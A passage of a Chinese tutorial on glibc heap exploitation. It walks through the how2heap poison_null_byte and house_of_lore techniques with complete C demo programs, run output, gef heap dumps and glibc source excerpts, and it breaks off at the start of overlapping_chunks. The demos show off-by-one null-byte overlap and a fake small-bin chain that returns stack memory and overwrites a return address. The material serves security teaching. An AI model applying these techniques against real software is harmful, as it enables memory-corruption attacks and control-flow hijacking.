# 3.3.7 Linux 堆利用(中) - [how2heap](#how2heap) - [poison_null_byte](#poison_null_byte) - [house_of_lore](#house_of_lore) - [overlapping_chunks](#overlapping_chunks) - [overlapping_chunks_2](#overlapping_chunks_2) [下载文件](../src/Others/3.3.6_heap_exploit) ## how2heap #### poison_null_byte ```c #include #include #include #include #include int main() { uint8_t *a, *b, *c, *b1, *b2, *d; a = (uint8_t*) malloc(0x10); int real_a_size = malloc_usable_size(a); fprintf(stderr, "We allocate 0x10 bytes for 'a': %p\n", a); fprintf(stderr, "'real' size of 'a': %#x\n", real_a_size); b = (uint8_t*) malloc(0x100); c = (uint8_t*) malloc(0x80); fprintf(stderr, "b: %p\n", b); fprintf(stderr, "c: %p\n", c); uint64_t* b_size_ptr = (uint64_t*)(b - 0x8); *(size_t*)(b+0xf0) = 0x100; fprintf(stderr, "b.size: %#lx ((0x100 + 0x10) | prev_in_use)\n\n", *b_size_ptr); // deal with tcache // int *k[10], i; // for (i = 0; i < 7; i++) { // k[i] = malloc(0x100); // } // for (i = 0; i < 7; i++) { // free(k[i]); // } free(b); uint64_t* c_prev_size_ptr = ((uint64_t*)c) - 2; fprintf(stderr, "After free(b), c.prev_size: %#lx\n", *c_prev_size_ptr); a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG" fprintf(stderr, "We overflow 'a' with a single null byte into the metadata of 'b'\n"); fprintf(stderr, "b.size: %#lx\n\n", *b_size_ptr); fprintf(stderr, "Pass the check: chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n", *((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8)))); b1 = malloc(0x80); memset(b1, 'A', 0x80); fprintf(stderr, "We malloc 'b1': %p\n", b1); fprintf(stderr, "c.prev_size: %#lx\n", *c_prev_size_ptr); fprintf(stderr, "fake c.prev_size: %#lx\n\n", *(((uint64_t*)c)-4)); b2 = malloc(0x40); memset(b2, 'A', 0x40); fprintf(stderr, "We malloc 'b2', our 'victim' chunk: %p\n", b2); // deal with tcache // for (i = 0; i < 7; i++) { // k[i] = malloc(0x80); // } // for (i = 0; i < 7; i++) { // free(k[i]); // } free(b1); free(c); fprintf(stderr, "Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n"); d = malloc(0x110); fprintf(stderr, "Finally, we allocate 'd', overlapping 'b2': %p\n\n", d); fprintf(stderr, "b2 content:%s\n", b2); memset(d, 'B', 0xb0); fprintf(stderr, "New b2 content:%s\n", b2); } ``` ``` $ gcc -g poison_null_byte.c $ ./a.out We allocate 0x10 bytes for 'a': 0xabb010 'real' size of 'a': 0x18 b: 0xabb030 c: 0xabb140 b.size: 0x111 ((0x100 + 0x10) | prev_in_use) After free(b), c.prev_size: 0x110 We overflow 'a' with a single null byte into the metadata of 'b' b.size: 0x100 Pass the check: chunksize(P) == 0x100 == 0x100 == prev_size (next_chunk(P)) We malloc 'b1': 0xabb030 c.prev_size: 0x110 fake c.prev_size: 0x70 We malloc 'b2', our 'victim' chunk: 0xabb0c0 Now we free 'b1' and 'c', this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2'). Finally, we allocate 'd', overlapping 'b2': 0xabb030 b2 content:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA New b2 content:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ``` 该技术适用的场景需要某个 malloc 的内存区域存在一个单字节溢出漏洞。通过溢出下一个 chunk 的 size 字段,攻击者能够在堆中创造出重叠的内存块,从而达到改写其他数据的目的。再结合其他的利用方式,同样能够获得程序的控制权。 对于单字节溢出的利用有下面几种: - 扩展被释放块:当溢出块的下一块为被释放块且处于 unsorted bin 中,则通过溢出一个字节来将其大小扩大,下次取得次块时就意味着其后的块将被覆盖而造成进一步的溢出 ``` 0x100 0x100 0x80 |-------|-------|-------| | A | B | C | 初始状态 |-------|-------|-------| | A | B | C | 释放 B |-------|-------|-------| | A | B | C | 溢出 B 的 size 为 0x180 |-------|-------|-------| | A | B | C | malloc(0x180-8) |-------|-------|-------| C 块被覆盖 |<--实际得到的块->| ``` - 扩展已分配块:当溢出块的下一块为使用中的块,则需要合理控制溢出的字节,使其被释放时的合并操作能够顺利进行,例如直接加上下一块的大小使其完全被覆盖。下一次分配对应大小时,即可取得已经被扩大的块,并造成进一步溢出 ``` 0x100 0x100 0x80 |-------|-------|-------| | A | B | C | 初始状态 |-------|-------|-------| | A | B | C | 溢出 B 的 size 为 0x180 |-------|-------|-------| | A | B | C | 释放 B |-------|-------|-------| | A | B | C | malloc(0x180-8) |-------|-------|-------| C 块被覆盖 |<--实际得到的块->| ``` - 收缩被释放块:此情况针对溢出的字节只能为 0 的时候,也就是本节所说的 poison-null-byte,此时将下一个被释放的块大小缩小,如此一来在之后分裂此块时将无法正确更新后一块的 prev_size 字段,导致释放时出现重叠的堆块 ``` 0x100 0x210 0x80 |-------|---------------|-------| | A | B | C | 初始状态 |-------|---------------|-------| | A | B | C | 释放 B |-------|---------------|-------| | A | B | C | 溢出 B 的 size 为 0x200 |-------|---------------|-------| 之后的 malloc 操作没有更新 C 的 prev_size 0x100 0x80 |-------|------|-----|--|-------| | A | B1 | B2 | | C | malloc(0x180-8), malloc(0x80-8) |-------|------|-----|--|-------| | A | B1 | B2 | | C | 释放 B1 |-------|------|-----|--|-------| | A | B1 | B2 | | C | 释放 C,C 将与 B1 合并 |-------|------|-----|--|-------| | A | B1 | B2 | | C | malloc(0x180-8) |-------|------|-----|--|-------| B2 将被覆盖 |<实际得到的块>| ``` - house of einherjar:也是溢出字节只能为 0 的情况,当它是更新溢出块下一块的 prev_size 字段,使其在被释放时能够找到之前一个合法的被释放块并与其合并,造成堆块重叠 ``` 0x100 0x100 0x101 |-------|-------|-------| | A | B | C | 初始状态 |-------|-------|-------| | A | B | C | 释放 A |-------|-------|-------| | A | B | C | 溢出 B,覆盖 C 块的 size 为 0x200,并使其 prev_size 为 0x200 |-------|-------|-------| | A | B | C | 释放 C |-------|-------|-------| | A | B | C | C 将与 A 合并 |-------|-------|-------| B 块被重叠 |<-----实际得到的块------>| ``` 首先分配三个 chunk,第一个 chunk 类型无所谓,但后两个不能是 fast chunk,因为 fast chunk 在释放后不会被合并。这里 chunk a 用于制造单字节溢出,去覆盖 chunk b 的第一个字节,chunk c 的作用是帮助伪造 fake chunk。 首先是溢出,那么就需要知道一个堆块实际可用的内存大小(因为空间复用,可能会比分配时要大一点),用于获得该大小的函数 `malloc_usable_size` 如下: ```c /* ------------------------- malloc_usable_size ------------------------- */ static size_t musable (void *mem) { mchunkptr p; if (mem != 0) { p = mem2chunk (mem); [...] if (chunk_is_mmapped (p)) return chunksize (p) - 2 * SIZE_SZ; else if (inuse (p)) return chunksize (p) - SIZE_SZ; } return 0; } ``` ```c /* check for mmap()'ed chunk */ #define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED) /* extract p's inuse bit */ #define inuse(p) \ ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE) /* Get size, ignoring use bits */ #define chunksize(p) ((p)->size & ~(SIZE_BITS)) ``` 所以 `real_a_size = chunksize(a) - 0x8 == 0x18`。另外需要注意的是程序是通过 next chunk 的 `PREV_INUSE` 标志来判断某 chunk 是否被使用的。 为了在修改 chunk b 的 size 字段后,依然能通过 unlink 的检查,我们需要伪造一个 c.prev_size 字段,字段的大小是很好计算的,即 `0x100 == (0x111 & 0xff00)`,正好是 NULL 字节溢出后的值。然后把 chunk b 释放掉,chunk b 随后被放到 unsorted bin 中,大小是 0x110。此时的堆布局如下: ``` gef➤ x/42gx a-0x10 0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a 0x603010: 0x0000000000000000 0x0000000000000000 0x603020: 0x0000000000000000 0x0000000000000111 <-- chunk b [be freed] 0x603030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603040: 0x0000000000000000 0x0000000000000000 0x603050: 0x0000000000000000 0x0000000000000000 0x603060: 0x0000000000000000 0x0000000000000000 0x603070: 0x0000000000000000 0x0000000000000000 0x603080: 0x0000000000000000 0x0000000000000000 0x603090: 0x0000000000000000 0x0000000000000000 0x6030a0: 0x0000000000000000 0x0000000000000000 0x6030b0: 0x0000000000000000 0x0000000000000000 0x6030c0: 0x0000000000000000 0x0000000000000000 0x6030d0: 0x0000000000000000 0x0000000000000000 0x6030e0: 0x0000000000000000 0x0000000000000000 0x6030f0: 0x0000000000000000 0x0000000000000000 0x603100: 0x0000000000000000 0x0000000000000000 0x603110: 0x0000000000000000 0x0000000000000000 0x603120: 0x0000000000000100 0x0000000000000000 <-- fake c.prev_size 0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c 0x603140: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603020, bk=0x603020 → Chunk(addr=0x603030, size=0x110, flags=PREV_INUSE) ``` 最关键的一步,通过溢出漏洞覆写 chunk b 的数据: ``` gef➤ x/42gx a-0x10 0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a 0x603010: 0x0000000000000000 0x0000000000000000 0x603020: 0x0000000000000000 0x0000000000000100 <-- chunk b [be freed] 0x603030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603040: 0x0000000000000000 0x0000000000000000 0x603050: 0x0000000000000000 0x0000000000000000 0x603060: 0x0000000000000000 0x0000000000000000 0x603070: 0x0000000000000000 0x0000000000000000 0x603080: 0x0000000000000000 0x0000000000000000 0x603090: 0x0000000000000000 0x0000000000000000 0x6030a0: 0x0000000000000000 0x0000000000000000 0x6030b0: 0x0000000000000000 0x0000000000000000 0x6030c0: 0x0000000000000000 0x0000000000000000 0x6030d0: 0x0000000000000000 0x0000000000000000 0x6030e0: 0x0000000000000000 0x0000000000000000 0x6030f0: 0x0000000000000000 0x0000000000000000 0x603100: 0x0000000000000000 0x0000000000000000 0x603110: 0x0000000000000000 0x0000000000000000 0x603120: 0x0000000000000100 0x0000000000000000 <-- fake c.prev_size 0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c 0x603140: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603020, bk=0x603020 → Chunk(addr=0x603030, size=0x100, flags=) ``` 这时,根据我们上一篇文字中讲到的计算方法: - `chunksize(P) == *((size_t*)(b-0x8)) & (~ 0x7) == 0x100` - `prev_size (next_chunk(P)) == *(size_t*)(b-0x10 + 0x100) == 0x100` 可以成功绕过检查。另外 unsorted bin 中的 chunk 大小也变成了 0x100。 接下来随意分配两个 chunk,malloc 会从 unsorted bin 中划出合适大小的内存返回给用户: ``` gef➤ x/42gx a-0x10 0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a 0x603010: 0x0000000000000000 0x0000000000000000 0x603020: 0x0000000000000000 0x0000000000000091 <-- chunk b1 <-- fake chunk b 0x603030: 0x4141414141414141 0x4141414141414141 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x4141414141414141 0x603060: 0x4141414141414141 0x4141414141414141 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x4141414141414141 0x4141414141414141 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000000 0x0000000000000051 <-- chunk b2 <-- 'victim' chunk 0x6030c0: 0x4141414141414141 0x4141414141414141 0x6030d0: 0x4141414141414141 0x4141414141414141 0x6030e0: 0x4141414141414141 0x4141414141414141 0x6030f0: 0x4141414141414141 0x4141414141414141 0x603100: 0x0000000000000000 0x0000000000000021 <-- unsorted bin 0x603110: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603120: 0x0000000000000020 0x0000000000000000 <-- fake c.prev_size 0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c 0x603140: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603100, bk=0x603100 → Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE) ``` 这里有个很有趣的东西,分配堆块后,发生变化的是 fake c.prev\_size,而不是 c.prev_size。所以 chunk c 依然认为 chunk b 的地方有一个大小为 0x110 的 free chunk。但其实这片内存已经被分配给了 chunk b1。 接下来是见证奇迹的时刻,我们知道,两个相邻的 small chunk 被释放后会被合并在一起。首先释放 chunk b1,伪造出 fake chunk b 是 free chunk 的样子。然后释放 chunk c,这时程序会发现 chunk c 的前一个 chunk 是一个 free chunk,然后就将它们合并在了一起,并从 unsorted bin 中取出来合并进了 top chunk。可怜的 chunk 2 位于 chunk b1 和 chunk c 之间,被直接无视了,现在 malloc 认为这整块区域都是未分配的,新的 top chunk 指针已经说明了一切。 ``` gef➤ x/42gx a-0x10 0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a 0x603010: 0x0000000000000000 0x0000000000000000 0x603020: 0x0000000000000000 0x0000000000020fe1 <-- top chunk 0x603030: 0x0000000000603100 0x00007ffff7dd1b78 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x4141414141414141 0x603060: 0x4141414141414141 0x4141414141414141 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x4141414141414141 0x4141414141414141 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000090 0x0000000000000050 <-- chunk b2 <-- 'victim' chunk 0x6030c0: 0x4141414141414141 0x4141414141414141 0x6030d0: 0x4141414141414141 0x4141414141414141 0x6030e0: 0x4141414141414141 0x4141414141414141 0x6030f0: 0x4141414141414141 0x4141414141414141 0x603100: 0x0000000000000000 0x0000000000000021 <-- unsorted bin 0x603110: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603120: 0x0000000000000020 0x0000000000000000 0x603130: 0x0000000000000110 0x0000000000000090 0x603140: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603100, bk=0x603100 → Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE) ``` chunk 合并的过程如下,首先该 chunk 与前一个 chunk 合并,然后检查下一个 chunk 是否为 top chunk,如果不是,将合并后的 chunk 放回 unsorted bin 中,否则,合并进 top chunk: ```c /* consolidate backward */ if (!prev_inuse(p)) { prevsize = p->prev_size; size += prevsize; p = chunk_at_offset(p, -((long) prevsize)); unlink(av, p, bck, fwd); } if (nextchunk != av->top) { /* Place the chunk in unsorted chunk list. Chunks are not placed into regular bins until after they have been given one chance to be used in malloc. */ [...] } /* If the chunk borders the current high end of memory, consolidate into top */ else { size += nextsize; set_head(p, size | PREV_INUSE); av->top = p; check_chunk(av, p); } ``` 接下来,申请一块大空间,大到可以把 chunk b2 包含进来,这样 chunk b2 就完全被我们控制了。 ``` gef➤ x/42gx a-0x10 0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a 0x603010: 0x0000000000000000 0x0000000000000000 0x603020: 0x0000000000000000 0x0000000000000121 <-- chunk d 0x603030: 0x4242424242424242 0x4242424242424242 0x603040: 0x4242424242424242 0x4242424242424242 0x603050: 0x4242424242424242 0x4242424242424242 0x603060: 0x4242424242424242 0x4242424242424242 0x603070: 0x4242424242424242 0x4242424242424242 0x603080: 0x4242424242424242 0x4242424242424242 0x603090: 0x4242424242424242 0x4242424242424242 0x6030a0: 0x4242424242424242 0x4242424242424242 0x6030b0: 0x4242424242424242 0x4242424242424242 <-- chunk b2 <-- 'victim' chunk 0x6030c0: 0x4242424242424242 0x4242424242424242 0x6030d0: 0x4242424242424242 0x4242424242424242 0x6030e0: 0x4141414141414141 0x4141414141414141 0x6030f0: 0x4141414141414141 0x4141414141414141 0x603100: 0x0000000000000000 0x0000000000000021 <-- small bins 0x603110: 0x00007ffff7dd1b88 0x00007ffff7dd1b88 <-- fd, bk pointer 0x603120: 0x0000000000000020 0x0000000000000000 0x603130: 0x0000000000000110 0x0000000000000090 0x603140: 0x0000000000000000 0x0000000000020ec1 <-- top chunk gef➤ heap bins small [ Small Bins for arena 'main_arena' ] [+] small_bins[1]: fw=0x603100, bk=0x603100 → Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE) ``` 还有个事情值得注意,在分配 chunk d 时,由于在 unsorted bin 中没有找到适合的 chunk,malloc 就将 unsorted bin 中的 chunk 都整理回各自的 bins 中了,这里就是 small bins。 最后,继续看 libc-2.26 上的情况,还是一样的,处理好 tchache 就可以了,把两种大小的 tcache bin 都占满。 heap-buffer-overflow,但不知道为什么,加了内存检测参数后,real size 只能是正常的 0x10 了。 ``` $ gcc -fsanitize=address -g poison_null_byte.c $ ./a.out We allocate 0x10 bytes for 'a': 0x60200000eff0 'real' size of 'a': 0x10 b: 0x611000009f00 c: 0x60c00000bf80 ================================================================= ==2369==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ef8 at pc 0x000000400be0 bp 0x7ffe7826e9a0 sp 0x7ffe7826e990 READ of size 8 at 0x611000009ef8 thread T0 #0 0x400bdf in main /home/firmy/how2heap/poison_null_byte.c:22 #1 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #2 0x400978 in _start (/home/firmy/how2heap/a.out+0x400978) 0x611000009ef8 is located 8 bytes to the left of 256-byte region [0x611000009f00,0x61100000a000) allocated by thread T0 here: #0 0x7f47d9425602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x400af1 in main /home/firmy/how2heap/poison_null_byte.c:15 #2 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) ``` #### house_of_lore ```c #include #include #include #include void jackpot(){ puts("Nice jump d00d"); exit(0); } int main() { intptr_t *victim = malloc(0x80); memset(victim, 'A', 0x80); void *p5 = malloc(0x10); memset(p5, 'A', 0x10); intptr_t *victim_chunk = victim - 2; fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim); intptr_t* stack_buffer_1[4] = {0}; intptr_t* stack_buffer_2[3] = {0}; stack_buffer_1[0] = 0; stack_buffer_1[2] = victim_chunk; stack_buffer_1[3] = (intptr_t*)stack_buffer_2; stack_buffer_2[2] = (intptr_t*)stack_buffer_1; fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1); fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2); free((void*)victim); fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim); fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); void *p2 = malloc(0x100); fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2); fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim); fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]); fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]); victim[1] = (intptr_t)stack_buffer_1; fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n"); void *p3 = malloc(0x40); char *p4 = malloc(0x80); memset(p4, 'A', 0x10); fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4); fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]); intptr_t sc = (intptr_t)jackpot; memcpy((p4+40), &sc, 8); } ``` ``` $ gcc -g house_of_lore.c $ ./a.out Allocated the victim (small) chunk: 0x1b2e010 stack_buffer_1: 0x7ffe5c570350 stack_buffer_2: 0x7ffe5c570330 Freeing the victim chunk 0x1b2e010, it will be inserted in the unsorted bin victim->fd: 0x7f239d4c9b78 victim->bk: 0x7f239d4c9b78 Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x1b2e0c0 The victim chunk 0x1b2e010 will be inserted in front of the SmallBin victim->fd: 0x7f239d4c9bf8 victim->bk: 0x7f239d4c9bf8 Now emulating a vulnerability that can overwrite the victim->bk pointer This last malloc should return a chunk at the position injected in bin->bk: 0x7ffe5c570360 The fd pointer of stack_buffer_2 has changed: 0x7f239d4c9bf8 Nice jump d00d ``` 在前面的技术中,我们已经知道怎样去伪造一个 fake chunk,接下来,我们要尝试伪造一条 small bins 链。 首先创建两个 chunk,第一个是我们的 victim chunk,请确保它是一个 small chunk,第二个随意,只是为了确保在 free 时 victim chunk 不会被合并进 top chunk 里。然后,在栈上伪造两个 fake chunk,让 fake chunk 1 的 fd 指向 victim chunk,bk 指向 fake chunk 2;fake chunk 2 的 fd 指向 fake chunk 1,这样一个 small bin 链就差不多了: ``` gef➤ x/26gx victim-2 0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk 0x603010: 0x4141414141414141 0x4141414141414141 0x603020: 0x4141414141414141 0x4141414141414141 0x603030: 0x4141414141414141 0x4141414141414141 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x4141414141414141 0x603060: 0x4141414141414141 0x4141414141414141 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x0000000000000000 0x0000000000000021 <-- chunk p5 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk 0x6030c0: 0x0000000000000000 0x0000000000000000 gef➤ x/10gx &stack_buffer_2 0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2 0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1 0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1 0x7fffffffdc60: 0x0000000000603000 0x00007fffffffdc30 <-- fd->victim chunk, bk->fake chunk 2 0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00 ``` molloc 中对于 small bin 链表的检查是这样的: ```c [...] else { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)) { errstr = "malloc(): smallbin double linked list corrupted"; goto errout; } set_inuse_bit_at_offset (victim, nb); bin->bk = bck; bck->fd = bin; [...] ``` 即检查 bin 中第二块的 bk 指针是否指向第一块,来发现对 small bins 的破坏。为了绕过这个检查,所以才需要同时伪造 bin 中的前 2 个 chunk。 接下来释放掉 victim chunk,它会被放到 unsoted bin 中,且 fd/bk 均指向 unsorted bin 的头部: ``` gef➤ x/26gx victim-2 0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk [be freed] 0x603010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603020: 0x4141414141414141 0x4141414141414141 0x603030: 0x4141414141414141 0x4141414141414141 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x4141414141414141 0x603060: 0x4141414141414141 0x4141414141414141 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x0000000000000090 0x0000000000000020 <-- chunk p5 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk 0x6030c0: 0x0000000000000000 0x0000000000000000 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603000, bk=0x603000 → Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE) ``` 这时,申请一块大的 chunk,只需要大到让 malloc 在 unsorted bin 中找不到合适的就可以了。这样原本在 unsorted bin 中的 chunk,会被整理回各自的所属的 bins 中,这里就是 small bins: ``` gef➤ heap bins small [ Small Bins for arena 'main_arena' ] [+] small_bins[8]: fw=0x603000, bk=0x603000 → Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE) ``` 接下来是最关键的一步,假设存在一个漏洞,可以让我们修改 victim chunk 的 bk 指针。那么就修改 bk 让它指向我们在栈上布置的 fake small bin: ``` gef➤ x/26gx victim-2 0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk [be freed] 0x603010: 0x00007ffff7dd1bf8 0x00007fffffffdc50 <-- bk->fake chunk 1 0x603020: 0x4141414141414141 0x4141414141414141 0x603030: 0x4141414141414141 0x4141414141414141 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x4141414141414141 0x603060: 0x4141414141414141 0x4141414141414141 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x0000000000000090 0x0000000000000020 <-- chunk p5 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000000 0x0000000000000111 <-- chunk p2 0x6030c0: 0x0000000000000000 0x0000000000000000 gef➤ x/10gx &stack_buffer_2 0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2 0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1 0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1 0x7fffffffdc60: 0x0000000000603000 0x00007fffffffdc30 <-- fd->victim chunk, bk->fake chunk 2 0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00 ``` 我们知道 small bins 是先进后出的,节点的增加发生在链表头部,而删除发生在尾部。这时整条链是这样的: ``` HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> victim chunk <-> TAIL fd: -> bk: <- ``` fake chunk 2 的 bk 指向了一个未定义的地址,如果能通过内存泄露等手段,拿到 HEAD 的地址并填进去,整条链就闭合了。当然这里完全没有必要这么做。 接下来的第一个 malloc,会返回 victim chunk 的地址,如果 malloc 的大小正好等于 victim chunk 的大小,那么情况会简单一点。但是这里我们不这样做,malloc 一个小一点的地址,可以看到,malloc 从 small bin 里取出了末尾的 victim chunk,切了一块返回给 chunk p3,然后把剩下的部分放回到了 unsorted bin。同时 small bin 变成了这样: ``` HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> TAIL ``` ``` gef➤ x/26gx victim-2 0x603000: 0x0000000000000000 0x0000000000000051 <-- chunk p3 0x603010: 0x00007ffff7dd1bf8 0x00007fffffffdc50 0x603020: 0x4141414141414141 0x4141414141414141 0x603030: 0x4141414141414141 0x4141414141414141 0x603040: 0x4141414141414141 0x4141414141414141 0x603050: 0x4141414141414141 0x0000000000000041 <-- unsorted bin 0x603060: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer 0x603070: 0x4141414141414141 0x4141414141414141 0x603080: 0x4141414141414141 0x4141414141414141 0x603090: 0x0000000000000040 0x0000000000000020 <-- chunk p5 0x6030a0: 0x4141414141414141 0x4141414141414141 0x6030b0: 0x0000000000000000 0x0000000000000111 <-- chunk p2 0x6030c0: 0x0000000000000000 0x0000000000000000 gef➤ x/10gx &stack_buffer_2 0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2 0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1 0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1 0x7fffffffdc60: 0x00007ffff7dd1bf8 0x00007fffffffdc30 <-- fd->TAIL, bk->fake chunk 2 0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00 gef➤ heap bins unsorted [ Unsorted Bin for arena 'main_arena' ] [+] unsorted_bins[0]: fw=0x603050, bk=0x603050 → Chunk(addr=0x603060, size=0x40, flags=PREV_INUSE) ``` 最后,再次 malloc 将返回 fake chunk 1 的地址,地址在栈上且我们能够控制。同时 small bin 变成这样: ``` HEAD(undefined) <-> fake chunk 2 <-> TAIL ``` ``` gef➤ x/10gx &stack_buffer_2 0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2 0x7fffffffdc40: 0x00007ffff7dd1bf8 0x0000000000400aed <-- fd->TAIL 0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- chunk 4 0x7fffffffdc60: 0x4141414141414141 0x4141414141414141 0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00 ``` 于是我们就成功地骗过了 malloc 在栈上分配了一个 chunk。 最后再想一下,其实最初的 victim chunk 使用 fast chunk 也是可以的,其释放后虽然是被加入到 fast bins 中,而不是 unsorted bin,但 malloc 之后,也会被整理到 small bins 里。自行尝试吧。 heap-use-after-free,所以上面我们用于修改 bk 指针的漏洞,应该就是一个 UAF 吧,当然溢出也是可以的: ``` $ gcc -fsanitize=address -g house_of_lore.c $ ./a.out Allocated the victim (small) chunk: 0x60c00000bf80 stack_buffer_1: 0x7ffd1fbc5cd0 stack_buffer_2: 0x7ffd1fbc5c90 Freeing the victim chunk 0x60c00000bf80, it will be inserted in the unsorted bin ================================================================= ==6034==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c00000bf80 at pc 0x000000400eec bp 0x7ffd1fbc5bf0 sp 0x7ffd1fbc5be0 READ of size 8 at 0x60c00000bf80 thread T0 #0 0x400eeb in main /home/firmy/how2heap/house_of_lore.c:27 #1 0x7febee33c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38) ``` #### overlapping_chunks ```c #include #include #include #include int main() { intptr_t *p1,*p2,*p3,*p4; p1 = malloc(0x90 - 8); p2 = malloc(0x90 - 8); p3 = malloc(0x80 - 8); memset(p1, 'A', 0x90 - 8); memset(p2, 'A', 0x90 - 8); 